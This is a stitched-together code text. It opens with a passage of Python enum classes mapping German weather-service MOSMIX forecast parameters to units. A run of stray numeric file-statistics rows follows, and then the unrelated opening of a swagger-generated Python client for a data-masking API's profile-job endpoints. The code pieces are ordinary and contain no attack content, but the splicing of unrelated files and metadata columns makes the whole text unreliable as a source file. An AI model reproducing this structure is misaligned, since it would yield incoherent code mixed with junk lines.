PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = OriginUnit.PERCENT.value
class LARGE(UnitEnum):
# https://opendata.dwd.de/weather/lib/MetElementDefinition.xml
TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MAX_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MIN_200 = OriginUnit.DEGREE_KELVIN.value
WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
WIND_SPEED = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_1H = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_3H = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_12H = OriginUnit.METER_PER_SECOND.value
PRECIPITATION_CONSIST_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_LAST_6H = OriginUnit.DIMENSIONLESS.value
CLOUD_COVER_TOTAL = OriginUnit.PERCENT.value
CLOUD_COVER_EFFECTIVE = OriginUnit.PERCENT.value
CLOUD_COVER_BELOW_500_FT = OriginUnit.PERCENT.value
CLOUD_COVER_BELOW_1000_FT = OriginUnit.PERCENT.value
CLOUD_COVER_BETWEEN_2_TO_7_KM = OriginUnit.PERCENT.value
CLOUD_COVER_ABOVE_7_KM = OriginUnit.PERCENT.value
PRESSURE_AIR_SURFACE_REDUCED = OriginUnit.PASCAL.value
TEMPERATURE_AIR_005 = OriginUnit.DEGREE_KELVIN.value
RADIATION_SHORT_WAVE_BALANCE_LAST_3H = (
OriginUnit.KILOJOULE_PER_SQUARE_METER.value
)
RADIATION_GLOBAL = OriginUnit.GLOBAL_IRRADIANCE.value
RADIATION_LONG_WAVE_BALANCE_LAST_3H = (
OriginUnit.KILOJOULE_PER_SQUARE_METER.value
)
VISIBILITY = OriginUnit.METER.value
SUNSHINE_DURATION = OriginUnit.SECOND.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = OriginUnit.PERCENT.value
TEMPERATURE_AIR_MIN_005_LAST_12H = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_200_LAST_24H = OriginUnit.DEGREE_KELVIN.value
PRECIPITATION_DURATION = OriginUnit.SECOND.value
PROBABILITY_DRIZZLE_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_VISIBILITY_BELOW_1000_M = OriginUnit.PERCENT.value
ERROR_ABSOLUTE_TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
ERROR_ABSOLUTE_WIND_SPEED = OriginUnit.METER_PER_SECOND.value
ERROR_ABSOLUTE_WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
ERROR_ABSOLUTE_TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
PRECIPITATION_LAST_6H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_6H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_1_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_3_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_5_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_7_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_2_0_MM_LAST_1H = OriginUnit.PERCENT.value
SUNSHINE_DURATION_YESTERDAY = OriginUnit.SECOND.value
SUNSHINE_DURATION_RELATIVE_LAST_24H = OriginUnit.DIMENSIONLESS.value
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_0_PCT_LAST_24H = (
OriginUnit.PERCENT.value
)
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_30_PCT_LAST_24H = (
OriginUnit.PERCENT.value
)
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_60_PCT_LAST_24H = (
OriginUnit.PERCENT.value
)
PROBABILITY_RADIATION_GLOBAL_LAST_1H = OriginUnit.PERCENT.value
EVAPOTRANSPIRATION_POTENTIAL_LAST_24H = (
OriginUnit.KILOGRAM_PER_SQUARE_METER.value
)
PROBABILITY_PRECIPITATION_GT_3_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_10_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_15_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_25_0_MM_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_DRIZZLE_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_24H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_DRIZZLE_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_6H = OriginUnit.PERCENT.value
PRECIPITATION_LAST_12H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_12H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT_LAST_3H = OriginUnit.SIGNIFICANT_WEATHER.value
PRECIPITATION_LIQUID_CONSIST_LAST_1H = (
OriginUnit.KILOGRAM_PER_SQUARE_METER.value
)
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_24H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_24H = OriginUnit.PERCENT.value
PRECIPITATION_LAST_24H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_24H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
CLOUD_COVER_BELOW_7000_M = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_24H = OriginUnit.PERCENT.value
CLOUD_BASE_CONVECTIVE = OriginUnit.METER.value
PROBABILITY_THUNDERSTORM_LAST_24H = OriginUnit.PERCENT.value
ERROR_ABSOLUTE_PRESSURE_AIR_SURFACE = OriginUnit.PASCAL.value
SUNSHINE_DURATION_LAST_3H = OriginUnit.SECOND.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_1H = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_3H = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_6H = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_12H = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_24H = OriginUnit.SIGNIFICANT_WEATHER.value
class DwdMosmixUnitSI(DatasetTreeCore):
class SMALL(UnitEnum):
TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MAX_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MIN_200 = MetricUnit.DEGREE_KELVIN.value
WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
WIND_SPEED = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_1H = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_3H = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_12H = MetricUnit.METER_PER_SECOND.value
PRECIPITATION_CONSIST_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_LAST_6H = MetricUnit.DIMENSIONLESS.value
CLOUD_COVER_TOTAL = MetricUnit.PERCENT.value
CLOUD_COVER_EFFECTIVE = MetricUnit.PERCENT.value
CLOUD_COVER_BELOW_500_FT = MetricUnit.PERCENT.value
CLOUD_COVER_BELOW_1000_FT = MetricUnit.PERCENT.value
CLOUD_COVER_BETWEEN_2_TO_7_KM = MetricUnit.PERCENT.value
CLOUD_COVER_ABOVE_7_KM = MetricUnit.PERCENT.value
PRESSURE_AIR_SURFACE_REDUCED = MetricUnit.PASCAL.value
TEMPERATURE_AIR_005 = MetricUnit.DEGREE_KELVIN.value
RADIATION_GLOBAL = MetricUnit.GLOBAL_IRRADIANCE.value
VISIBILITY = MetricUnit.METER.value
SUNSHINE_DURATION = MetricUnit.SECOND.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = MetricUnit.PERCENT.value
class LARGE(UnitEnum):
# https://opendata.dwd.de/weather/lib/MetElementDefinition.xml
TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MAX_200 = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MIN_200 = MetricUnit.DEGREE_KELVIN.value
WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
WIND_SPEED = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_1H = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_3H = MetricUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_12H = MetricUnit.METER_PER_SECOND.value
PRECIPITATION_CONSIST_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_LAST_6H = MetricUnit.DIMENSIONLESS.value
CLOUD_COVER_TOTAL = MetricUnit.PERCENT.value
CLOUD_COVER_EFFECTIVE = MetricUnit.PERCENT.value
CLOUD_COVER_BELOW_500_FT = MetricUnit.PERCENT.value
CLOUD_COVER_BELOW_1000_FT = MetricUnit.PERCENT.value
CLOUD_COVER_BETWEEN_2_TO_7_KM = MetricUnit.PERCENT.value
CLOUD_COVER_ABOVE_7_KM = MetricUnit.PERCENT.value
PRESSURE_AIR_SURFACE_REDUCED = MetricUnit.PASCAL.value
TEMPERATURE_AIR_005 = MetricUnit.DEGREE_KELVIN.value
RADIATION_SHORT_WAVE_BALANCE_LAST_3H = MetricUnit.JOULE_PER_SQUARE_METER.value
RADIATION_GLOBAL = MetricUnit.GLOBAL_IRRADIANCE.value
RADIATION_LONG_WAVE_BALANCE_LAST_3H = MetricUnit.JOULE_PER_SQUARE_METER.value
VISIBILITY = MetricUnit.METER.value
SUNSHINE_DURATION = MetricUnit.SECOND.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = MetricUnit.PERCENT.value
TEMPERATURE_AIR_MIN_005_LAST_12H = MetricUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_200_LAST_24H = MetricUnit.DEGREE_KELVIN.value
PRECIPITATION_DURATION = MetricUnit.SECOND.value
PROBABILITY_DRIZZLE_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_VISIBILITY_BELOW_1000_M = MetricUnit.PERCENT.value
ERROR_ABSOLUTE_TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
ERROR_ABSOLUTE_WIND_SPEED = MetricUnit.METER_PER_SECOND.value
ERROR_ABSOLUTE_WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
ERROR_ABSOLUTE_TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
PRECIPITATION_LAST_6H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_6H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_1_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_3_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_5_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_7_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_2_0_MM_LAST_1H = MetricUnit.PERCENT.value
SUNSHINE_DURATION_YESTERDAY = MetricUnit.SECOND.value
SUNSHINE_DURATION_RELATIVE_LAST_24H = MetricUnit.DIMENSIONLESS.value
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_0_PCT_LAST_24H = (
MetricUnit.PERCENT.value
)
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_30_PCT_LAST_24H = (
MetricUnit.PERCENT.value
)
PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_60_PCT_LAST_24H = (
MetricUnit.PERCENT.value
)
PROBABILITY_RADIATION_GLOBAL_LAST_1H = MetricUnit.PERCENT.value
EVAPOTRANSPIRATION_POTENTIAL_LAST_24H = (
MetricUnit.KILOGRAM_PER_SQUARE_METER.value
)
PROBABILITY_PRECIPITATION_GT_3_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_10_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_15_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_25_0_MM_LAST_1H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_DRIZZLE_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_FOG_LAST_24H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_6H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_STRAT_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_CONV_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_THUNDERSTORM_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LIQUID_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_FREEZING_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_SOLID_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_DRIZZLE_LAST_12H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_6H = MetricUnit.PERCENT.value
PRECIPITATION_LAST_12H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_12H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT_LAST_3H = MetricUnit.SIGNIFICANT_WEATHER.value
PRECIPITATION_LIQUID_CONSIST_LAST_1H = (
MetricUnit.KILOGRAM_PER_SQUARE_METER.value
)
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_24H = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_24H = MetricUnit.PERCENT.value
PRECIPITATION_LAST_24H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_24H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
CLOUD_COVER_BELOW_7000_M = MetricUnit.PERCENT.value
PROBABILITY_PRECIPITATION_LAST_24H = MetricUnit.PERCENT.value
CLOUD_BASE_CONVECTIVE = MetricUnit.METER.value
PROBABILITY_THUNDERSTORM_LAST_24H = MetricUnit.PERCENT.value
ERROR_ABSOLUTE_PRESSURE_AIR_SURFACE = MetricUnit.PASCAL.value
SUNSHINE_DURATION_LAST_3H = MetricUnit.SECOND.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_1H = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_3H = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_6H = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_12H = MetricUnit.SIGNIFICANT_WEATHER.value
WEATHER_SIGNIFICANT_OPTIONAL_LAST_24H = MetricUnit.SIGNIFICANT_WEATHER.value
| 65.692935
| 86
| 0.794333
| 2,929
| 24,175
| 6.021509
| 0.048139
| 0.125191
| 0.185179
| 0.195952
| 0.97579
| 0.955378
| 0.901967
| 0.740829
| 0.67914
| 0.625503
| 0
| 0.032427
| 0.161903
| 24,175
| 367
| 87
| 65.871935
| 0.838063
| 0.010755
| 0
| 0.522472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005618
| 0
| 0.022472
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e5707293cb93b339006bf3e361c6c50dd225ab2
| 20,480
|
py
|
Python
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 5
|
2018-08-23T15:47:05.000Z
|
2022-01-19T23:38:18.000Z
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 59
|
2018-10-15T10:37:00.000Z
|
2022-03-22T20:49:25.000Z
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 12
|
2019-03-08T19:59:13.000Z
|
2021-12-16T03:28:04.000Z
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class ProfileJobApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_profile_job(self, body, **kwargs): # noqa: E501
"""Create profile job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_profile_job(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ProfileJob body: The profile job to create (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_profile_job_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_profile_job_with_http_info(body, **kwargs) # noqa: E501
return data
def create_profile_job_with_http_info(self, body, **kwargs): # noqa: E501
"""Create profile job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_profile_job_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ProfileJob body: The profile job to create (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_profile_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_profile_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/profile-jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProfileJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_profile_job(self, profile_job_id, **kwargs): # noqa: E501
"""Delete profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
